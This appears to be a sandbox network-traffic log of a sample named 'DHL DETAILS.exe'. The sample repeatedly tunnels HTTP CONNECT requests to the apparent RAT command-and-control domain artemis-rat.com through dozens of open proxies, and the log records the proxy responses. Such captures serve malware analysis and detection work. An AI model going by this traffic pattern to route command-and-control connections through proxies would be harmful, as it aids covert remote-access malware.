Mar 9, 2024 13:14:15.765261889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.833291054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833997011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
891	192.168.2.5	52851	51.15.247.93	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.765331030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
892	192.168.2.5	52973	104.17.37.235	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.765336037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.919801950 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
893	192.168.2.5	52613	117.160.250.132	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.780132055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.973855019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.703419924 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
894	192.168.2.5	52459	117.160.250.163	9999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.781481981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.502624035 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:16 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
895	192.168.2.5	52870	70.166.167.55	57745	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.781548023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
896	192.168.2.5	50265	163.172.169.27	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.837326050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.833408117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833997011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.833096981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
897	192.168.2.5	52858	203.218.172.225	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.837383986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
898	192.168.2.5	52855	39.105.27.30	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.837496996 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:16.198471069 CET	38	IN	HTTP/1.1 200 OK content-length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
899	192.168.2.5	52860	58.234.116.197	8197	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.837728977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
900	192.168.2.5	52856	8.222.164.205	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.837800026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
901	192.168.2.5	52868	51.210.223.9	3000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.837805986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
902	192.168.2.5	52850	45.11.95.166	6002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.837857008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
903	192.168.2.5	52992	192.154.244.92	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.838527918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
904	192.168.2.5	52994	162.159.241.160	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.838649035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.999521017 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
905	192.168.2.5	52887	188.166.17.18	8881	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.841567039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
906	192.168.2.5	51866	47.243.114.192	8180	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.841799974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
907	192.168.2.5	52898	18.135.211.182	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.842128038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.137001038 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
908	192.168.2.5	53016	104.16.109.143	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.843235970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.997459888 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
909	192.168.2.5	51975	51.75.126.150	11802	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.844001055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
910	192.168.2.5	52867	185.220.226.235	808	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.853046894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
911	192.168.2.5	52721	110.93.227.28	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.853221893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.615243912 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
912	192.168.2.5	50204	91.134.140.160	56495	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.853600979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.380209923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
913	192.168.2.5	52910	146.56.146.5	48384	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.860914946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.536403894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
914	192.168.2.5	53012	159.65.77.168	8585	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.861026049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
915	192.168.2.5	51776	187.40.1.123	128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.861329079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036209106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.386306047 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
916	192.168.2.5	50248	91.134.140.160	39803	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.864203930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.536247015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.224265099 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.536668062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.037000895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
917	192.168.2.5	52901	43.133.70.57	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.870383024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
918	192.168.2.5	50407	162.241.79.22	52048	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.878536940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036418915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
919	192.168.2.5	52993	129.213.150.205	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.885886908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
920	192.168.2.5	52899	51.161.131.84	49202	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.910062075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.723855019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.833388090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.038846016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
921	192.168.2.5	52948	130.162.213.175	3129	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.912744045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
922	192.168.2.5	52001	92.204.135.37	63462	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.937289953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.973859072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
923	192.168.2.5	52978	221.153.92.39	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.959683895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
924	192.168.2.5	52943	185.49.30.5	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.962574005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
925	192.168.2.5	52942	194.182.178.90	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
